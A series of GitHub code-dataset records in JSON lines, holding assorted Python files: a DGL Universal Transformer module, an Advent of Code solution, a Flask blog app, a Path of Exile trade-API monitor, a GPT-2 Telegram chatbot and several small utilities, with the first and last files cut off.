layer.self_attn.get_o(wv / z)\n x = x + layer.sublayer[l].dropout(o)\n if l == 1:\n x = layer.sublayer[2](x, layer.feed_forward)\n return {\"x\": x}\n\n return func\n\n\nclass HaltingUnit(nn.Module):\n halting_bias_init = 1.0\n\n def __init__(self, dim_model):\n super(HaltingUnit, self).__init__()\n self.linear = nn.Linear(dim_model, 1)\n self.norm = LayerNorm(dim_model)\n INIT.constant_(self.linear.bias, self.halting_bias_init)\n\n def forward(self, x):\n return th.sigmoid(self.linear(self.norm(x)))\n\n\nclass UTransformer(nn.Module):\n \"Universal Transformer(https://arxiv.org/pdf/1807.03819.pdf) with ACT(https://arxiv.org/pdf/1603.08983.pdf).\"\n MAX_DEPTH = 8\n thres = 0.99\n act_loss_weight = 0.01\n\n def __init__(\n self,\n encoder,\n decoder,\n src_embed,\n tgt_embed,\n pos_enc,\n time_enc,\n generator,\n h,\n d_k,\n ):\n super(UTransformer, self).__init__()\n self.encoder, self.decoder = encoder, decoder\n self.src_embed, self.tgt_embed = src_embed, tgt_embed\n self.pos_enc, self.time_enc = pos_enc, time_enc\n self.halt_enc = HaltingUnit(h * d_k)\n self.halt_dec = HaltingUnit(h * d_k)\n self.generator = generator\n self.h, self.d_k = h, d_k\n self.reset_stat()\n\n def reset_stat(self):\n self.stat = [0] * (self.MAX_DEPTH + 1)\n\n def step_forward(self, nodes):\n x = nodes.data[\"x\"]\n step = nodes.data[\"step\"]\n pos = nodes.data[\"pos\"]\n return {\n \"x\": self.pos_enc.dropout(\n x + 
self.pos_enc(pos.view(-1)) + self.time_enc(step.view(-1))\n ),\n \"step\": step + 1,\n }\n\n def halt_and_accum(self, name, end=False):\n \"field: 'enc' or 'dec'\"\n halt = self.halt_enc if name == \"enc\" else self.halt_dec\n thres = self.thres\n\n def func(nodes):\n p = halt(nodes.data[\"x\"])\n sum_p = nodes.data[\"sum_p\"] + p\n active = (sum_p < thres) & (1 - end)\n _continue = active.float()\n r = nodes.data[\"r\"] * (1 - _continue) + (1 - sum_p) * _continue\n s = (\n nodes.data[\"s\"]\n + ((1 - _continue) * r + _continue * p) * nodes.data[\"x\"]\n )\n return {\"p\": p, \"sum_p\": sum_p, \"r\": r, \"s\": s, \"active\": active}\n\n return func\n\n def propagate_attention(self, g, eids):\n # Compute attention score\n g.apply_edges(src_dot_dst(\"k\", \"q\", \"score\"), eids)\n g.apply_edges(scaled_exp(\"score\", np.sqrt(self.d_k)), eids)\n # Send weighted values to target nodes\n g.send_and_recv(\n eids,\n [fn.u_mul_e(\"v\", \"score\", \"v\"), fn.copy_e(\"score\", \"score\")],\n [fn.sum(\"v\", \"wv\"), fn.sum(\"score\", \"z\")],\n )\n\n def update_graph(self, g, eids, pre_pairs, post_pairs):\n \"Update the node states and edge states of the graph.\"\n # Pre-compute queries and key-value pairs.\n for pre_func, nids in pre_pairs:\n g.apply_nodes(pre_func, nids)\n self.propagate_attention(g, eids)\n # Further calculation after attention mechanism\n for post_func, nids in post_pairs:\n g.apply_nodes(post_func, nids)\n\n def forward(self, graph):\n g = graph.g\n N, E = graph.n_nodes, graph.n_edges\n nids, eids = graph.nids, graph.eids\n\n # embed & pos\n g.nodes[nids[\"enc\"]].data[\"x\"] = self.src_embed(graph.src[0])\n g.nodes[nids[\"dec\"]].data[\"x\"] = self.tgt_embed(graph.tgt[0])\n g.nodes[nids[\"enc\"]].data[\"pos\"] = graph.src[1]\n g.nodes[nids[\"dec\"]].data[\"pos\"] = graph.tgt[1]\n\n # init step\n device = next(self.parameters()).device\n g.ndata[\"s\"] = th.zeros(\n N, self.h * self.d_k, dtype=th.float, device=device\n ) # accumulated state\n g.ndata[\"p\"] = th.zeros(\n N, 1, dtype=th.float, device=device\n ) # halting prob\n g.ndata[\"r\"] = th.ones(N, 1, dtype=th.float, device=device) # remainder\n g.ndata[\"sum_p\"] = th.zeros(\n N, 1, dtype=th.float, device=device\n ) # sum of pondering values\n g.ndata[\"step\"] = th.zeros(N, 1, dtype=th.long, device=device) # step\n g.ndata[\"active\"] = th.ones(\n N, 1, dtype=th.uint8, device=device\n ) # active\n\n for step in range(self.MAX_DEPTH):\n pre_func = self.encoder.pre_func(\"qkv\")\n post_func = self.encoder.post_func()\n nodes = g.filter_nodes(\n lambda v: v.data[\"active\"].view(-1), nids[\"enc\"]\n )\n if len(nodes) == 0:\n break\n edges = g.filter_edges(\n lambda e: e.dst[\"active\"].view(-1), eids[\"ee\"]\n )\n end = step == self.MAX_DEPTH - 1\n self.update_graph(\n g,\n edges,\n [(self.step_forward, nodes), (pre_func, nodes)],\n [(post_func, nodes), (self.halt_and_accum(\"enc\", end), nodes)],\n )\n\n g.nodes[nids[\"enc\"]].data[\"x\"] = self.encoder.norm(\n g.nodes[nids[\"enc\"]].data[\"s\"]\n )\n\n for step in range(self.MAX_DEPTH):\n pre_func = self.decoder.pre_func(\"qkv\")\n post_func = self.decoder.post_func()\n nodes = g.filter_nodes(\n lambda v: v.data[\"active\"].view(-1), nids[\"dec\"]\n )\n if len(nodes) == 0:\n break\n edges = g.filter_edges(\n lambda e: e.dst[\"active\"].view(-1), eids[\"dd\"]\n )\n self.update_graph(\n g,\n edges,\n [(self.step_forward, nodes), (pre_func, nodes)],\n [(post_func, nodes)],\n )\n\n pre_q = self.decoder.pre_func(\"q\", 1)\n pre_kv = self.decoder.pre_func(\"kv\", 1)\n post_func 
= self.decoder.post_func(1)\n nodes_e = nids[\"enc\"]\n edges = g.filter_edges(\n lambda e: e.dst[\"active\"].view(-1), eids[\"ed\"]\n )\n end = step == self.MAX_DEPTH - 1\n self.update_graph(\n g,\n edges,\n [(pre_q, nodes), (pre_kv, nodes_e)],\n [(post_func, nodes), (self.halt_and_accum(\"dec\", end), nodes)],\n )\n\n g.nodes[nids[\"dec\"]].data[\"x\"] = self.decoder.norm(\n g.nodes[nids[\"dec\"]].data[\"s\"]\n )\n act_loss = th.mean(g.ndata[\"r\"]) # ACT loss\n\n self.stat[0] += N\n for step in range(1, self.MAX_DEPTH + 1):\n self.stat[step] += th.sum(g.ndata[\"step\"] >= step).item()\n\n return (\n self.generator(g.ndata[\"x\"][nids[\"dec\"]]),\n act_loss * self.act_loss_weight,\n )\n\n def infer(self, *args, **kwargs):\n raise NotImplementedError\n\n\ndef make_universal_model(\n src_vocab, tgt_vocab, dim_model=512, dim_ff=2048, h=8, dropout=0.1\n):\n c = copy.deepcopy\n attn = MultiHeadAttention(h, dim_model)\n ff = PositionwiseFeedForward(dim_model, dim_ff)\n pos_enc = PositionalEncoding(dim_model, dropout)\n time_enc = PositionalEncoding(dim_model, dropout)\n encoder = UEncoder(EncoderLayer((dim_model), c(attn), c(ff), dropout))\n decoder = UDecoder(\n DecoderLayer((dim_model), c(attn), c(attn), c(ff), dropout)\n )\n src_embed = Embeddings(src_vocab, dim_model)\n tgt_embed = Embeddings(tgt_vocab, dim_model)\n generator = Generator(dim_model, tgt_vocab)\n model = UTransformer(\n encoder,\n decoder,\n src_embed,\n tgt_embed,\n pos_enc,\n time_enc,\n generator,\n h,\n dim_model // h,\n )\n # xavier init\n for p in model.parameters():\n if p.dim() > 1:\n INIT.xavier_uniform_(p)\n return model\n","repo_name":"dmlc/dgl","sub_path":"examples/pytorch/transformer/modules/act.py","file_name":"act.py","file_ext":"py","file_size_in_byte":9549,"program_lang":"python","lang":"en","doc_type":"code","stars":12455,"dataset":"github-code","pt":"54"} +{"seq_id":"7879484770","text":"\"\"\" Advent of code 2021 day 09 / 2 \"\"\"\n\nfrom os import path\nimport math\n\npos = [(-1, 0), (1, 0), (0, -1), (0, 1)]\n\n\nclass Code(object):\n def __init__(self, lines):\n self.lines = lines\n self.height = len(lines)\n self.width = len(lines[0])\n\n def fillpos(self, y, x):\n pl = []\n for (dy, dx) in pos:\n ny = dy+y\n nx = dx + x\n np = (ny, nx)\n if ny >= 0 and ny < self.height and nx >= 0 and nx < self.width:\n pl.append(np)\n return pl\n\n def lowpoints(self):\n lst = []\n\n for y, row in enumerate(self.lines):\n for x, c in enumerate(row):\n # print(c)\n shouldadd = [\n self.lines[ny][nx] > c\n for [ny, nx]\n in self.fillpos(y, x)\n ]\n if all(shouldadd):\n # print(c)\n lst.append((y, x))\n return lst\n\n def basin(self, y, x):\n res = 0\n visited = set()\n pl = self.fillpos(y, x)\n while len(pl) > 0:\n nc = pl.pop()\n [ny, nx] = nc\n # print(\"visit\", nc)\n if nc in visited:\n # print(\"seen\", nc)\n continue\n if self.lines[ny][nx] == 9:\n # print(\"wall\", nc)\n continue\n res += 1\n visited.add(nc)\n newcoords = self.fillpos(ny, nx)\n pl += newcoords\n # print(\"added\", res, newcoords, pl)\n # print(\"finished\", res)\n return res\n\n def solve(self):\n # print(self.lines)\n lp = self.lowpoints()\n sizes = [self.basin(y, x) for [y, x] in lp]\n return math.prod(sorted(sizes, reverse=True)[:3])\n\n\ndef preprocess(raw_data):\n # pattern = re.compile(r'(\\w+) (\\d+)')\n processed_data = []\n for line in raw_data.split(\"\\n\"):\n # match = re.match(pattern, line)\n # data = [match.group(1), match.group(2)]\n data = line\n processed_data.append(list(map(int, data)))\n return processed_data\n\n\ndef 
solution(data):\n    \"\"\" Solution to the problem \"\"\"\n    lines = preprocess(data)\n    solver = Code(lines)\n    return solver.solve()\n\n\nif __name__ == \"__main__\":\n    with(open(path.join(path.dirname(__file__), 'input.txt'), 'r')) as input_file:\n        print(solution(input_file.read()))\n","repo_name":"budavariam/advent_of_code","sub_path":"2021/09_2/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":2413,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"}
{"seq_id":"73202720481","text":"# -*- coding:utf-8\n\nclass User(object):\n\t__instance = None\n\n\tdef __init__(self, name):\n\t\tself.name = name\n\n\t@classmethod\n\tdef get_instance(cls, name):\n\t\tif not cls.__instance: # if __instance is None\n\t\t\tcls.__instance = User(name)\n\t\t\tprint(\"11111\")\n\t\treturn cls.__instance\n\n#u1 = User('zs')\n#u2 = User('ls')\nu1 = User.get_instance('zs')\nu2 = User.get_instance('ls')\nprint(u1 == u2) # if the == comparison returns True, the two objects are one and the same object, with the same memory address\nprint(\"memory address of u1: %s\\nmemory address of u2: %s\" % (id(u1), id(u2)))\n","repo_name":"CoderSahara/Python_Study","sub_path":"第8天/02-单例模式1.py","file_name":"02-单例模式1.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"}
{"seq_id":"36700085591","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('survey', '0001_initial'),\n    ]\n\n    operations = [\n        migrations.AlterField(\n            model_name='autum',\n            name='name',\n            field=models.CharField(verbose_name='客户姓名', max_length=12),\n        ),\n    ]\n","repo_name":"j-iNFINITE/ICS","sub_path":"survey/migrations/0002_auto_20151113_1617.py","file_name":"0002_auto_20151113_1617.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"3434647192","text":"from flask import Flask, render_template, request, redirect, url_for\nfrom flask_sqlalchemy import SQLAlchemy\nfrom datetime import datetime\nimport os\n\n\nSQLALCHEMY_DATABASE_URI = os.environ.get('DATABASE_URL').replace('postgres', 'postgresql')\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = SQLALCHEMY_DATABASE_URI\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\ndb = SQLAlchemy(app)\n\n\nclass Article(db.Model):\n    __tablename__ = 'Articles'\n\n    id = db.Column(db.Integer, primary_key=True)\n    title = db.Column(db.String(50), nullable=False)\n    description = db.Column(db.String(250), nullable=False)\n    content = db.Column(db.Text, nullable=False)\n    date = db.Column(db.DateTime, default=datetime.utcnow)\n\n    comments = db.relationship('Comment', backref='article', lazy=True)\n\n    def __init__(self, title, description, content):\n        self.title = title\n        self.description = description\n        self.content = content\n\n    def __repr__(self):\n        return '<Article %r>' % self.id\n\n\nclass Comment(db.Model):\n    __tablename__ = 'Comments'\n\n    id = db.Column(db.Integer, primary_key=True)\n    content = db.Column(db.String(250), nullable=False)\n\n    article_id = db.Column(db.Integer, db.ForeignKey('Articles.id', ondelete='CASCADE'))\n\n    def __init__(self, content):\n        self.content = content\n\n    def __repr__(self):\n        return '<Comment %r>' % self.id\n\n\n\n@app.route('/')\n@app.route('/home')\ndef index():\n    return render_template('index.html')\n\n\n# articles\n\n@app.route('/articles')\ndef articles():\n    articles = Article.query.order_by(Article.date.desc()).all()\n\n    return 
render_template('articles.html', articles=articles)\n\n\n@app.route('/create-article', methods=['POST', 'GET'])\ndef create_article():\n    if request.method == 'POST':\n        title = request.form['title']\n        description = request.form['description']\n        content = request.form['content']\n\n        if not title or not description or not content:\n            return 'Fields cannot be empty!'\n        \n        article = Article(title, description, content)\n\n        db.session.add(article)\n        db.session.commit()\n        \n        return redirect('/articles')\n\n    return render_template('create-article.html')\n\n\n@app.route('/articles/<int:id>')\ndef get_article(id):\n    article = Article.query.filter_by(id=id).first()\n\n    if not article:\n        return 'Object not found!!'\n\n    return render_template('get-article.html', article=article)\n\n\n@app.route('/articles/<int:id>/update', methods=['POST', 'GET'])\ndef update_article(id):\n    article = Article.query.filter_by(id=id).first()\n\n    if request.method == 'POST':\n        title = request.form['title']\n        description = request.form['description']\n        content = request.form['content']\n\n        if not title or not description or not content:\n            return 'Fields cannot be empty!!'\n        \n        article.title = title\n        article.description = description\n        article.content = content\n\n        db.session.commit()\n\n        return redirect('/articles')\n\n    return render_template('update-article.html', article=article)\n\n\n@app.route('/articles/<int:id>/delete')\ndef delete_article(id):\n    article = Article.query.filter_by(id=id).first()\n\n    if article:\n        db.session.delete(article)\n        db.session.commit()\n\n        return redirect('/articles')\n    else:\n        return 'Object not found!'\n\n\n# comments\n\n@app.route('/article/<int:article_id>', methods=['POST', 'GET'])\ndef create_comment(article_id):\n    article = Article.query.filter_by(id=article_id).first()\n\n    if request.method == 'POST':\n        content = request.form['content']\n\n        if not content:\n            return 'Comment cannot be empty!!'\n        \n        comment = Comment(content)\n        comment.article = article\n\n        db.session.add(comment)\n        db.session.commit()\n\n    return redirect(f'/articles/{article_id}')\n\n\n@app.route('/articles/<int:article_id>/comments/<int:comment_id>/update', methods=['POST', 'GET'])\ndef update_comment(article_id, comment_id):\n    comment = Comment.query.filter_by(id=comment_id).first()\n\n    if request.method == 'POST':\n        content = request.form['content']\n\n        if not content:\n            return 'Comment cannot be empty!'\n\n        comment.content = content\n        db.session.commit()\n\n        return redirect(f'/articles/{article_id}')\n\n    return render_template('update-comment.html', comment=comment)\n\n\n@app.route('/articles/<int:article_id>/comments/<int:comment_id>/delete')\ndef delete_comment(article_id, comment_id):\n    comment = Comment.query.filter_by(id=comment_id).first()\n\n    if not comment:\n        return 'Object not found!'\n    \n    db.session.delete(comment)\n    db.session.commit()\n\n    return redirect(f'/articles/{article_id}')\n\n\nif __name__ == '__main__':\n    app.run(debug=True)\n","repo_name":"AndyLanYT/db_lab3","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"43536405987","text":"#sleep no 1. 
2 \r\n\r\nimport matplotlib.pyplot as plt \r\nimport numpy as np \r\n\r\n#generate x values \r\nx = np.linspace(-5,5,100)\r\n#generate y value using function \r\n\r\ny = np.exp(-x**2)\r\n\r\n\r\n#create 3dplot \r\nfig = plt.figure()\r\nax = fig.add_subplot(111,projection='3d')\r\n\r\nax.plot(x,y,np.zeros_like(x), linestyle= 'dashed', color='green' )\r\n\r\nax.set_xlabel('x')\r\nax.set_ylabel('Y')\r\nax.set_title(' 3d Graph f(x) = e ** -x ** 2')\r\nplt.show()","repo_name":"sachingavalicoding/Backupfiles","sub_path":"PYTHON/plot3d.py","file_name":"plot3d.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"35026999804","text":"'''\n@Author: Doncey Albin\n\nConvenience Function for converting jpg to bmp\n'''\nfrom PIL import Image\n\ndef convert_jpg_to_bmp(input_path, output_path):\n    try:\n        # Open the image\n        img = Image.open(input_path)\n\n        # Convert the image to RGB mode if it's not already\n        if img.mode != \"RGB\":\n            img = img.convert(\"RGB\")\n\n        # Display some info about the image\n        print(f\"Image format: {img.format}\")\n        print(f\"Image mode: {img.mode}\")\n        print(f\"Image size: {img.size}\")\n\n        # Save the image in BMP format\n        img.save(output_path, \"BMP\")\n\n    except Exception as e:\n        print(f\"An error occurred: {e}\")\n\n# Example usage:\nconvert_jpg_to_bmp(\"wooden_crate.jpg\", \"wooden_crate.bmp\")\n","repo_name":"donceykong/BRAR","sub_path":"assets/convert_jpg_bmp.py","file_name":"convert_jpg_bmp.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"39832391657","text":"from .testing_utils import MockPainter\nfrom ..graphics_node import GraphicsNode, NodeType\n\n\ndef test_paint():\n    painter = MockPainter()\n    node = GraphicsNode((1, 1), 5, 'node')\n\n    node.paint(painter)\n\n    r = 5\n    expected = [(1, 1, r, r)]\n\n    assert painter.ellipses == expected\n\n\ndef test_paint_labels():\n    painter = MockPainter()\n    name = 'node'\n    node = GraphicsNode((1, 1), 5, name)\n\n    node.paint_labels(painter)\n\n    # default offset\n    expected = [(1 + 5, 1 + 5, name)]\n    assert painter.texts == expected\n    painter.clear()\n\n    # specified offset\n    node.paint_labels(painter, offset=0)\n    expected = [(1, 1, name)]\n    assert painter.texts == expected\n\n\ndef test_type():\n    node = GraphicsNode((1, 1), 5, 'node')\n\n    assert node.get_type() == NodeType.PRESSURE_NODE\n\n    node.set_type(NodeType.COMPONENT_NODE)\n    assert node.get_type() == NodeType.COMPONENT_NODE\n\n\ndef test_comparisons():\n    node1 = GraphicsNode((1, 1), 5, 'node')\n\n    equals = GraphicsNode((1, 1), 5, 'node')\n    less = GraphicsNode((1, 1), 5, 'a')\n    greater = GraphicsNode((1, 1), 5, 'z')\n\n    assert node1 == equals\n    assert node1 != less\n    assert less < node1\n    assert greater > node1\n","repo_name":"waterloo-rocketry/topside","sub_path":"application/plumbing_vis/tests/test_graphics_node.py","file_name":"test_graphics_node.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"54"}
{"seq_id":"73471879521","text":"# exalts.py\n# A simple proof of concept for running live searches of the path of exile trade api \n# exalts.py\n# a python script to monitor the Path of Exile public stash API \n# only looks for specific item names\n# must get a cur_change_id from somewhere to start the process \n\nimport requests \nimport time\nimport sys\nimport datetime\n\n# number of timeouts 
to allow before program termination\nkillcount = 5\n\n\ndef main():\n # track the number of drinks from the API river\n chunklogger = 0\n\n # configuration variables\n mycharname = \"dummyplaceholdernamegoeshere\"\n ping_rate = 1 # number of seconds to sleep between API requests\n cur_league = \"Harbinger\"\n # end configuration variables\n\n print(\"PoE Trade Monitor booting up...\")\n\n # read from file the most recent cur_change_id written by the program\n river_log = open('ccid', 'r')\n cur_change_id = river_log.readline()\n river_log.close()\n\n target_item = raw_input(\"Hello. Starting at cur_change_id \" + cur_change_id + \".\\nType in the name of the item you are looking for:\\n\\n\")\n # target_item = \"Tabula Rasa\"\n print(\"Great. Let's check the live data stream for \" + target_item + \"...\")\n timetrack = datetime.datetime.now()\n time.sleep(ping_rate)\n\n # continuously monitor the stream of new stash data looking for the item\n while(True):\n # break if the API has failed too many times\n if (killcount <= 0):\n break\n stashcount = 0 \n chunklogger +=1 \n # sanity tries to break if a chunk is too big for some reason; probably redundant now\n sanity = 0\n\n data = get_api_data(cur_change_id)\n if (data == False):\n with open(\"bingo\", \"a\") as myfile:\n myfile.write(\"\\nData retrieval error on data chunk \" + str(chunklogger) + ' at Timestamp: {:%Y-%m-%d %H:%M:%S}'.format(datetime.datetime.now()))\n print(\"Data retrieval error, probably an API timeout...\")\n continue\n # get the time between now and the last API call to see how we're doing\n elapsed = datetime.datetime.now() - timetrack\n timetrack = datetime.datetime.now()\n icount = 0\n for stash in data[\"stashes\"]:\n stashcount += 1\n if (stash[\"lastCharacterName\"] == mycharname or stash[\"lastCharacterName\"] == \"sonofsmashington\" or stash[\"lastCharacterName\"] == \"SonOfSmashington\"):\n with open(\"bingo\", \"a\") as myfile:\n myfile.write(\"\\nMy stashes at: \" + cur_change_id + \" \\n\")\n print(\"!!!!!!! ----------- ______ found my own stash ______ ------------- !!!!!!!!!!!!!\")\n if (sanity > 50000):\n break \n for item in stash[\"items\"]:\n if (target_item in item[\"name\"]):\n # if stash[\"public\"] and \"note\" in item and item[\"league\"] == cur_league:\n if stash[\"public\"] and \"note\" in item:\n print(\"-------------------\")\n # print a formatted trade message to actually use in the game if desired\n print(\"@\" + stash[\"lastCharacterName\"] + \" I'd like to buy your \" + target_item + \" from your \" + stash[\"stash\"] + \" stash tab, listed at \" + item[\"note\"] + \" in \" + item[\"league\"] + \" league.\")\n print(\"-------------------\")\n # print (item[\"name\"])\n sanity += 1\n icount += 1\n if (sanity > 50000):\n print (\"50,000 items searched in this chunk but no match was found\")\n break \n cur_change_id = data[\"next_change_id\"]\n print(\"# Checked \" + str(icount) + \" items from \" + str(stashcount) + \" stashes in \" + str(elapsed.seconds) + \" seconds. Checked \" + str(chunklogger) + \" data chunk(s). Next cur_change_id is: \" + cur_change_id)\n # log the next cur_change_id for the next drink from the river, and to use the next time the program is run\n saveloc = open('ccid', 'w')\n saveloc.write(cur_change_id)\n saveloc.close()\n time.sleep(ping_rate)\n # print a quit message if the killcount limit is reached (too many API timeouts)\n print(\"####### Program finished, too many timeouts ocurred! 
#######\")\n\ndef get_api_data(ccid):\n global killcount\n poeapiurl = \"http://api.pathofexile.com/public-stash-tabs/?id=\"\n try:\n new_stash_data = requests.get(poeapiurl + ccid, timeout = 5)\n if (new_stash_data.status_code != requests.codes.ok):\n print(\"ERROR: http request status code fail! The API request didn't work for some reason (the API might be down?)\")\n return False\n current_chunk = new_stash_data.json()\n return current_chunk\n except:\n killcount -= 1\n print(\"Your API request failed\")\n return False\n \n# run the program\nmain()","repo_name":"eqmvii/poeindexertest","sub_path":"exalts.py","file_name":"exalts.py","file_ext":"py","file_size_in_byte":4893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"551136665","text":"import nltk\nimport json\nfrom pprint import pprint\nfrom operator import itemgetter\nimport matplotlib.pyplot as plt\nimport plotly.plotly as py\nimport plotly\nimport numpy as np\nwith open('tweets.json',encoding='utf-8') as data_file:\n dictionary = json.loads(data_file.read())\nenter_word = input(\"Give the word:\")\nnew_dictionary={}\nfor i in range(0,len(dictionary)):\n input_one = dict(dictionary[i])\n d = int((str(input_one['created_at'])[:7]).replace(\"-\", \"\"))\n m = input_one['text']\n n = nltk.word_tokenize(m)\n for word in n:\n if word == enter_word:\n if d not in new_dictionary:\n new_dictionary[d] = 0\n new_dictionary[d] += 1\npprint(new_dictionary)\n\n\ndatas = []\nnr =[]\nfor item, key in new_dictionary.items():\n datas.append(str(item))\n# print(datas)\ndatas = sorted(datas)\n# print(datas)\ntimp = []\nfor i in range(0, len(datas)):\n nr.append(new_dictionary[int(datas[i])])\n datas[i] = str(datas[i])\n # timp.append(time.strptime(datas[i], \"%Y%m\"))\n\n# pprint(timp)\n# print(datas)\n# print(nr)\n# plt.bar(datas, nr, color=\"blue\")\ny_pos = np.arange(len(datas))\n\nplt.bar(y_pos, nr, align='center', alpha=0.5)\n# plt.plot(datas, nr)\nplt.xticks(y_pos, datas)\nplt.ylabel('Usage')\nplt.xlabel('data')\nplt.title('the use ')\n\nplt.show()\n","repo_name":"MihaiGaidau/lab3","sub_path":"g.py","file_name":"g.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"17130069405","text":"from telegram.ext import Updater, CommandHandler, MessageHandler, Filters\nfrom telegram import ChatAction, ParseMode\nfrom functools import wraps\nimport configparser\nimport argparse\nimport logging\nfrom urllib.parse import urlencode\nimport requests\nfrom requests.adapters import HTTPAdapter\nfrom urllib3.util import Retry\nimport re\n\nfrom gpt2bot.model import download_model_folder, download_reverse_model_folder, load_model\nfrom gpt2bot.decoder_wrapper import generateTurn\nfrom gpt2bot.api_wrapper import new_chat, add_message_to_chat_history\n\n# Rule based chat system\nfrom rulebased_bot.rulebased_bot import check_message_intent\n\n# Enable logging\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n\n# https://github.com/python-telegram-bot/python-telegram-bot/wiki/Code-snippets\n\ndef start_command(update, context):\n context.chat_data['turns'] = []\n active_chat_id = update.message.chat_id\n print(\"CHAT ID:\" + str(active_chat_id))\n update.message.reply_text(\n \"Please give the following number to the researcher that guides your experiment:\" + str(active_chat_id))\n\n\ndef 
requests_retry_session(\n        retries=3,\n        backoff_factor=0.3,\n        status_forcelist=(500, 502, 504),\n        session=None,\n):\n    session = session or requests.Session()\n    retry = Retry(\n        total=retries,\n        read=retries,\n        connect=retries,\n        backoff_factor=backoff_factor,\n        status_forcelist=status_forcelist,\n    )\n    adapter = HTTPAdapter(max_retries=retry)\n    session.mount('http://', adapter)\n    session.mount('https://', adapter)\n    return session\n\n\ndef translate_message_to_gif(message, config):\n    # https://engineering.giphy.com/contextually-aware-search-giphy-gets-work-specific/\n    params = {\n        'api_key': config.get('chatbot', 'giphy_token'),\n        's': message,\n        'weirdness': config.getint('chatbot', 'giphy_weirdness')\n    }\n    url = \"http://api.giphy.com/v1/gifs/translate?\" + urlencode(params)\n    response = requests_retry_session().get(url)\n    return response.json()['data']['images']['fixed_height']['url']\n\n\ndef self_decorator(self, func):\n    \"\"\"Passes bot object to func command.\"\"\"\n\n    def command_func(update, context, *args, **kwargs):\n        return func(self, update, context, *args, **kwargs)\n\n    return command_func\n\n\ndef send_action(action):\n    \"\"\"Sends `action` while processing func command.\"\"\"\n\n    def decorator(func):\n        @wraps(func)\n        def command_func(self, update, context, *args, **kwargs):\n            context.bot.send_chat_action(chat_id=update.effective_message.chat_id, action=action)\n            return func(self, update, context, *args, **kwargs)\n\n        return command_func\n\n    return decorator\n\n\nsend_typing_action = send_action(ChatAction.TYPING)\n\n\ndef gpt_normalize(txt):\n    txt = re.sub(r\"[^A-Za-z0-9()\\[\\]:,.!?'“”\\\"]\", \" \", txt) # remove illegal chars\n    return ' '.join(txt.strip().split()) # remove unnecessary spaces\n\n\n@send_typing_action\ndef message(self, update, context):\n    # Parse parameters\n    num_samples = self.config.getint('decoder', 'num_samples')\n    max_turns_history = self.config.getint('decoder', 'max_turns_history')\n    default_properties = self.config.getboolean('decoder', 'default_properties')\n\n    if 'turns' not in context.chat_data:\n        context.chat_data['turns'] = []\n    turns = context.chat_data['turns']\n\n    user_message = update.message.text\n    add_message_to_chat_history('user', 0, user_message, default_properties)\n\n    if user_message.lower() == 'bye':\n        # Restart chat\n        context.chat_data['turns'] = []\n        update.message.reply_text(\"Bye\")\n        add_message_to_chat_history('bot', 0, \"Bye\", default_properties)\n        new_chat()\n        return None\n\n    if default_properties:\n        print(\"DEFAULT PROPERTIES ARE ACTIVE\")\n        max_turns_history = 2\n        rule_based_response = \"\"\n        num_samples = 1\n\n    else:\n        rule_based_response = check_message_intent(user_message.lower())\n\n    if rule_based_response == \"\":\n        if max_turns_history == 0:\n            # If you still get different responses then set seed\n            context.chat_data['turns'] = []\n\n        bot_message, turns = generateTurn(turns, user_message, max_turns_history, num_samples, self.model,\n                                          self.tokenizer,\n                                          self.config, self.mmi_model,\n                                          self.mmi_tokenizer)\n\n        logger.info(f\"{update.effective_message.chat_id} - Bot >>> {bot_message}\")\n\n        update.message.reply_text(bot_message)\n        add_message_to_chat_history('bot', 0, bot_message, default_properties)\n\n\ndef error(update, context):\n    logger.warning(context.error)\n\n\nclass TelegramBot:\n    def __init__(self, model, tokenizer, config, mmi_model=None, mmi_tokenizer=None):\n        logger.info(\"Initializing the bot...\")\n\n        # Set global variables\n        self.model = model\n        self.tokenizer = tokenizer\n        self.mmi_model = mmi_model\n        
self.mmi_tokenizer = mmi_tokenizer\n self.config = config\n\n # Set up Telegram bot\n self.updater = Updater(config.get('chatbot', 'telegram_token'), use_context=True)\n dp = self.updater.dispatcher\n\n # on different commands - answer in Telegram\n # conversation with bot\n dp.add_handler(MessageHandler(Filters.text, self_decorator(self, message)))\n\n # chatbot settings\n dp.add_handler(CommandHandler('start', start_command))\n\n # log all errors\n dp.add_error_handler(error)\n\n def run_chat(self):\n logger.info(\"Running the chatbot...\")\n\n # Start the Bot\n self.updater.start_polling()\n\n # Run the bot until you press Ctrl-C or the process receives SIGINT,\n # SIGTERM or SIGABRT. This should be used most of the time, since\n # start_polling() is non-blocking and will stop the bot gracefully.\n self.updater.idle()\n\n\ndef main():\n # Script arguments can include path of the config\n arg_parser = argparse.ArgumentParser()\n arg_parser.add_argument('--config', type=str, default=\"gpt2bot/chatbot.cfg\")\n args = arg_parser.parse_args()\n\n # Read the config\n config = configparser.ConfigParser(allow_no_value=True)\n config.read(\"secrets.cfg\")\n with open(args.config) as f:\n config.read_file(f)\n\n # Download and load main model\n target_folder_name = download_model_folder(config)\n model, tokenizer = load_model(target_folder_name, config)\n\n # Download and load reverse model\n use_mmi = config.getboolean('model', 'use_mmi')\n if 